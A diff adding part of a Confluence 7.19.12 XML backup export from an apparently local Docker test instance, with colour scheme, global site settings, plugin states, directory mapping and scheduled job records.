+      <string>property.style.topbarmenuselectedbgcolour</string>
+      <string>#336699</string>
+    </entry>
+    <entry>
+      <string>property.style.menuselectedbgcolour</string>
+      <string>#6699cc</string>
+    </entry>
+    <entry>
+      <string>property.style.navtextcolour</string>
+      <string>#ffffff</string>
+    </entry>
+    <entry>
+      <string>property.style.bordercolour</string>
+      <string>#6699cc</string>
+    </entry>
+    <entry>
+      <string>property.style.navselectedtextcolour</string>
+      <string>#ffffff</string>
+    </entry>
+    <entry>
+      <string>property.style.breadcrumbstextcolour</string>
+      <string>#ffffff</string>
+    </entry>
+    <entry>
+      <string>property.style.topbarcolour</string>
+      <string>#003366</string>
+    </entry>
+    <entry>
+      <string>property.style.navselectedbgcolour</string>
+      <string>#003366</string>
+    </entry>
+    <entry>
+      <string>property.style.linkcolour</string>
+      <string>#326ca6</string>
+    </entry>
+    <entry>
+      <string>property.style.navbgcolour</string>
+      <string>#6699cc</string>
+    </entry>
+    <entry>
+      <string>property.style.menuitemselectedtextcolour</string>
+      <string>#ffffff</string>
+    </entry>
+    <entry>
+      <string>property.style.menuitemselectedbgcolour</string>
+      <string>#6699cc</string>
+    </entry>
+    <entry>
+      <string>property.style.headingtextcolour</string>
+      <string>#000000</string>
+    </entry>
+    <entry>
+      <string>property.style.spacenamecolour</string>
+      <string>#999999</string>
+    </entry>
+    <entry>
+      <string>property.style.menuitemtextcolour</string>
+      <string>#535353</string>
+    </entry>
+    <entry>
+      <string>property.style.topbarmenuitemtextcolour</string>
+      <string>#326ca6</string>
+    </entry>
+  </colours>
+</colourScheme>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32789</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[trash.date.migration.time]]></property>
+<property name="value"><![CDATA[<instant>2023-11-09T06:03:52.619272Z</instant>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32818</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.troubleshooting.thready.configuration.enabled]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32819</id>
+<property name="context"><![CDATA[_CALENDAR_ee65026d81383713d11480a2da8ced1608ea1448]]></property>
+<property name="key"><![CDATA[legacySubCalendarsMigrationCutoffDate]]></property>
+<property name="value"><![CDATA[<long>1699509861003</long>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32816</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..policy_acknowledged]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32817</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm.log.PluginSettingsAuditLogService:log:upm_audit_log_v3]]></property>
+<property name="value"><![CDATA[<list>
+  <string>{&quot;userKey&quot;:&quot;Confluence&quot;,&quot;date&quot;:1699509860734,&quot;i18nKey&quot;:&quot;upm.auditLog.upm.startup&quot;,&quot;entryType&quot;:&quot;UPM_STARTUP&quot;,&quot;params&quot;:[]}</string>
+</list>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32814</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.analytics.client.configuration.uuid]]></property>
+<property name="value"><![CDATA[<string>102be6f5-2e40-4d37-bd5e-e52aef8f80fb</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32815</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.analytics.client.configuration.serverid]]></property>
+<property name="value"><![CDATA[<string>BNRR-EUMS-GPB5-FJVB</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32812</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-create-content-plugin:build]]></property>
+<property name="value"><![CDATA[<string>5</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32813</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[gadget.counter]]></property>
+<property name="value"><![CDATA[<int>2</int>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32810</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.authentication.sso.config.sso-type]]></property>
+<property name="value"><![CDATA[<string>NONE</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32811</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.authentication.sso.config.show-login-form]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32808</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.upm.atlassian-universal-plugin-manager-plugin:build]]></property>
+<property name="value"><![CDATA[<string>5</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32809</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.authentication.atlassian-authentication-plugin:build]]></property>
+<property name="value"><![CDATA[<string>6</string>]]></property>
+</object>
+<object class="DirectoryMapping" package="com.atlassian.crowd.model.application">
+<id name="id">393217</id>
+<property name="application" class="ApplicationImpl" package="com.atlassian.crowd.model.application"><id name="id">327681</id>
+</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="allowAllToAuthenticate">true</property>
+<collection name="allowedOperations" class="java.util.Set"><element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_ROLE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_USER_ATTRIBUTE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_USER</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_ROLE</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">CREATE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">DELETE_GROUP</element>
+<element enum-class="OperationType" package="com.atlassian.crowd.embedded.api">UPDATE_ROLE</element>
+</collection>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32806</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-collaborative-editor-plugin:build]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32807</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-roadmap-plugin:build]]></property>
+<property name="value"><![CDATA[<string>6</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32804</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-space-ia:build]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32805</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_app_registered]]></property>
+<property name="value"><![CDATA[<string>true</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32770</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[confluence.server.installation.date]]></property>
+<property name="value"><![CDATA[<date>2023-11-09 06:02:30.133 UTC</date>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32771</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[atlassian.confluence.settings]]></property>
+<property name="value"><![CDATA[<settings>
+  <doNotSave>false</doNotSave>
+  <allowCamelCase>false</allowCamelCase>
+  <allowTrackbacks>false</allowTrackbacks>
+  <allowThreadedComments>true</allowThreadedComments>
+  <externalUserManagement>false</externalUserManagement>
+  <denyPublicSignup>true</denyPublicSignup>
+  <emailAdminMessageOff>false</emailAdminMessageOff>
+  <almostSupportPeriodEndMessageOff>false</almostSupportPeriodEndMessageOff>
+  <senMissingInLicenseMessageOff>true</senMissingInLicenseMessageOff>
+  <baseUrlAdminMessageOff>false</baseUrlAdminMessageOff>
+  <allowRemoteApi>false</allowRemoteApi>
+  <allowRemoteApiAnonymous>false</allowRemoteApiAnonymous>
+  <antiXssMode>true</antiXssMode>
+  <gzippingResponse>true</gzippingResponse>
+  <disableLogo>false</disableLogo>
+  <sharedMode>false</sharedMode>
+  <enableDidYouMean>false</enableDidYouMean>
+  <enableQuickNav>true</enableQuickNav>
+  <enableSpaceStyles>false</enableSpaceStyles>
+  <enableOpenSearch>true</enableOpenSearch>
+  <showSystemInfoIn500Page>false</showSystemInfoIn500Page>
+  <showApplicationTitle>false</showApplicationTitle>
+  <captchaSettings>
+    <enableCaptcha>false</enableCaptcha>
+    <enableDebug>false</enableDebug>
+    <captchaGroups class="list"/>
+    <exclude>registered</exclude>
+  </captchaSettings>
+  <customHtmlSettings>
+    <beforeHeadEnd></beforeHeadEnd>
+    <afterBodyStart></afterBodyStart>
+    <beforeBodyEnd></beforeBodyEnd>
+  </customHtmlSettings>
+  <colourSchemesSettings>
+    <colourSchemeType>custom</colourSchemeType>
+  </colourSchemesSettings>
+  <loginManagerSettings>
+    <enableElevatedSecurityCheck>true</enableElevatedSecurityCheck>
+    <loginAttemptsThreshold>3</loginAttemptsThreshold>
+  </loginManagerSettings>
+  <confluenceHttpParameters>
+    <connectionTimeout>10000</connectionTimeout>
+    <socketTimeout>10000</socketTimeout>
+    <enabled>true</enabled>
+  </confluenceHttpParameters>
+  <attachmentMaxSize>104857600</attachmentMaxSize>
+  <auditLogRetentionNumber>3</auditLogRetentionNumber>
+  <auditLogRetentionUnit>Years</auditLogRetentionUnit>
+  <draftSaveInterval>30000</draftSaveInterval>
+  <maxAttachmentsInUI>5</maxAttachmentsInUI>
+  <siteTitle>Confluence</siteTitle>
+  <documentationUrlPattern>http://docs.atlassian.com/confluence/docs-{0}/{1}</documentationUrlPattern>
+  <showContactAdministratorsForm>true</showContactAdministratorsForm>
+  <emailAddressVisibility>email.address.public</emailAddressVisibility>
+  <defaultEncoding>UTF-8</defaultEncoding>
+  <maxThumbHeight>300</maxThumbHeight>
+  <maxThumbWidth>300</maxThumbWidth>
+  <backupAttachmentsDaily>true</backupAttachmentsDaily>
+  <backupDaily>true</backupDaily>
+  <backupPath>/var/atlassian/application-data/confluence/backups</backupPath>
+  <nofollowExternalLinks>true</nofollowExternalLinks>
+  <indexingLanguage>english</indexingLanguage>
+  <globalDefaultLocale>en_GB</globalDefaultLocale>
+  <dailyBackupFilePrefix>backup-</dailyBackupFilePrefix>
+  <dailyBackupDateFormatPattern>yyyy_MM_dd</dailyBackupDateFormatPattern>
+  <supportRequestEmail>confluence-autosupportrequests@atlassian.com</supportRequestEmail>
+  <defaultSpaceHomepageTitle>Home</defaultSpaceHomepageTitle>
+  <baseUrl>http://nessus-docker.local:8090</baseUrl>
+  <attachmentDataStore>file.system.based.attachments.storage</attachmentDataStore>
+  <displayLinkIcons>false</displayLinkIcons>
+  <addWildcardsToUserAndGroupSearches>true</addWildcardsToUserAndGroupSearches>
+  <xsrfAddComments>true</xsrfAddComments>
+  <webSudoTimeout>10</webSudoTimeout>
+  <webSudoEnabled>true</webSudoEnabled>
+  <defaultUsersGroup>confluence-users</defaultUsersGroup>
+  <attachmentSecurityLevel>smart</attachmentSecurityLevel>
+  <enableJavascriptTop>true</enableJavascriptTop>
+  <supportPeriodEndMessageOff>false</supportPeriodEndMessageOff>
+  <enableWysiwyg>true</enableWysiwyg>
+  <useWysiwygByDefault>true</useWysiwygByDefault>
+  <numberOfBreadcrumbAncestors>1</numberOfBreadcrumbAncestors>
+  <viewSpaceGoesToSpaceSummary>false</viewSpaceGoesToSpaceSummary>
+  <enableLikes>false</enableLikes>
+  <currentIndexVersion>0</currentIndexVersion>
+  <maintenanceBannerMessageOn>false</maintenanceBannerMessageOn>
+  <maxSimultaneousQuickNavRequests>40</maxSimultaneousQuickNavRequests>
+  <maxRssItems>200</maxRssItems>
+  <rssTimeout>60</rssTimeout>
+  <pageTimeout>120</pageTimeout>
+</settings>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32769</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[confluence.server.id]]></property>
+<property name="value"><![CDATA[<string>BNRR-EUMS-GPB5-FJVB</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32786</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[atlassian.confluence.space.settings]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.setup.settings.SpaceSettings>
+  <spaceKey>ds</spaceKey>
+  <disableLogo>false</disableLogo>
+  <colourSchemesSettings>
+    <colourSchemeType>global</colourSchemeType>
+  </colourSchemesSettings>
+  <doNotSave>false</doNotSave>
+</com.atlassian.confluence.setup.settings.SpaceSettings>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32787</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[sidebar.nav-type]]></property>
+<property name="value"><![CDATA[<string>page-tree</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32784</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[atlassian.confluence.theme.settings]]></property>
+<property name="value"><![CDATA[<map>
+  <entry>
+    <string>theme.key</string>
+    <string></string>
+  </entry>
+</map>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32785</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[atlassian.confluence.css.resource.counter]]></property>
+<property name="value"><![CDATA[<int>4</int>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32782</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[atlassian.confluence.plugin.resource.counter]]></property>
+<property name="value"><![CDATA[<int>2</int>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32783</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[copyspace.copier.spacekey]]></property>
+<property name="value"><![CDATA[<string>DEMO</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32780</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_950DC3_#]]></property>
+<property name="value"><![CDATA[<string>20</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32781</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[plugin.manager.state.Map]]></property>
+<property name="value"><![CDATA[<map>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-trashed-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-inline-tasks:task-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-created-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-trashed-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-edited-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-edited-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.share-page:share-page-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-moved-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-like:like-created-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.synchrony-interop</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-request-access-plugin:request-access-notification-email-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:follower-added-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-hipchat-integration-plugin</string>
+    <boolean>false</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-created-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-onboarding:notification-template-less-users-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.plugins.base-hipchat-integration-plugin-api</string>
+    <boolean>false</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-file-notifications:file-content-update-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-onboarding:notification-template-no-spaces-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-collaborative-editor-plugin</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-mentions-plugin:mention-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.plugins.base-hipchat-integration-plugin</string>
+    <boolean>false</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-edited-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-new-mail-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-notifications-batch-plugin:batching-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.share-page:share-attachment-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.share-page:share-draft-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-created-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-edited-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-resolve-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-inline-comments:notification-template-reply-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-inline-tasks:task-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-hipchat-emoticons-plugin</string>
+    <boolean>false</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.share-page:share-page-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-created-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-edited-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:blogpost-edited-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:follower-added-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:comment-created-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:page-created-hipchat-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-content-notifications-plugin:forgot-password-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-mentions-plugin:mention-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-file-notifications:file-content-remove-email-notification-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-request-access-plugin:grant-access-notification-email-template-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.confluence.plugins.confluence-like:like-created-notification-template-hipchat-body</string>
+    <boolean>true</boolean>
+  </entry>
+  <entry>
+    <string>com.atlassian.labs.hipchat.confluence-hipchat</string>
+    <boolean>false</boolean>
+  </entry>
+</map>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32778</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_9412A1_#]]></property>
+<property name="value"><![CDATA[<string>8</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32779</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_7B47A5_#]]></property>
+<property name="value"><![CDATA[<string>4</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32776</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_187CCC_#]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32777</id>
+<property name="context"><![CDATA[com.atlassian.confluence.plugins.pulp]]></property>
+<property name="key"><![CDATA[version.history]]></property>
+<property name="value"><![CDATA[<map>
+  <entry>
+    <string>7.19.12</string>
+    <string>2023-11-09T06:02:36.753Z</string>
+  </entry>
+</map>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32774</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_21D670_#]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="Secrets" package="com.atlassian.synchrony">
+<id name="key"><![CDATA[Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad]]></id>
+<property name="value"><![CDATA[ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32775</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[AO_A0B856_#]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32772</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[synchrony_collaborative_editor_UUID]]></property>
+<property name="value"><![CDATA[<string>d32aafab-7f6d-4630-a017-f69b71948e20</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32773</id>
+<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
+<property name="key"><![CDATA[efi.store.onboarding.plugin-installed-date-in-millis]]></property>
+<property name="value"><![CDATA[<string>1699509752102</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32866</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#DailyReportJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32867</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#cacheStatsJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32864</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#BackupJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32865</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#SynchronyEventsSoftRemovalScheduledJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32862</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#MailQueueFlushJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32863</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#SchedulerRunDetailsPurgeJob]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
+  <enabled>true</enabled>
+  <cronSchedule/>
+  <repeatInterval/>
+</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32860</id>
+<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
+<property name="key"><![CDATA[DEFAULT#ClearExpiredRememberMeTokensJob]]></property>
